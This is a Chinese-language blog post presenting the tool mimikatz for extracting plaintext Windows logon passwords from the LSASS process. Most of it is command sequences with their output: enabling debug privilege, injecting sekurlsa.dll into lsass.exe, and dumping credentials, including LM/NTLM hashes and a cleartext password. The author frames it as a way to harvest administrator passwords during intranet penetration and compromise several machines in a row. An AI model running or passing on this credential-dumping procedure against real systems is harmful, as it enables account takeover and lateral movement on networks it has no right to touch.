现在的位置: 首页技术文章>正文
神器mimikatz
发表于1702 天前 技术文章 评论关闭

   mimikatz:从Lsass进程中抓取Windows登陆明文密码

发现个神器啊,mimikatz,具体看下文

Gentil Kiwi  http://blog.gentilkiwi.com/mimikatz

+———————————————————————————————————————-+

测试平台: Windows Server 2008 r2 <本人VMware虚拟机>

mimikatz #privilege::debug
Demande d’ACTIVATION du privilège : SeDebugPrivilege : OK
mimikatz #inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 496
Attente de connexion du client…
Serveur connecté à un client !
Message du processus :
Bienvenue dans un processus distant
Gentil Kiwi
SekurLSA : librairie de manipulation des données de sécurités dans LSASS
mimikatz #@getLogonPasswords
Authentification Id         : 0;366364
Package d’authentification  : NTLM
Utilisateur principal       :Administrator
Domaine d’authentification  : WIN-ICESWORDSEC
msv1_0 :        lm{ d33ca390b24d954a3b108f3fa4cb6d }, ntlm{ f1b98bbb522fe6a968ff623b9614255c }
wdigest  :       ICesw0rD
tspkg    :        ICesw0rD

{……………………………………………..}

 

+——————————————-远程登陆之情况——————————————————+

测试环境:Windows 2008 r2 Enterprise

所需文件: mimikatz.exe、sekurlsa.dll   (X86的机器选择Win32,X64的选择x64)

如果渗透内网的话,经常需要去获取管理员的登陆密码(我邪恶了,有时候可以一连搞下好多台)。

我以一个普通用户登陆的时候,提示权限不足、存储空间不足各种失败;于是我去注册表复制了Administrator的权限,然后登陆(此时我拥有最高权限),这次终于成功了。

/*运行mimikatz.exe*/

mimikatz #privilege::debug            
/*权限提升*/

mimikatz #inject::process lsass.exe “C\mi\sekurlsa.dll”

/*注入进程,sekurlsa.dll需写绝对路径*/
mimikatz#getLogonPasswords

/*获取登陆密码*/

[+]———————————————————————————————————————————————-[+]

 测试环境: Windows Server 2003 Enterprise SP2 X86 (一台VPS网站服务器)

[+]———————————————————————————————————————————————-[+]

 测试环境: Windows 8 Comsumer Preview X64

  以Windows Live账户登陆时:

 

+———————————————————————————————————————-+

读取扫雷游戏内存

 

下载地址:http://blog.gentilkiwi.com/mimikatz

抱歉!评论已关闭.

×
腾讯微博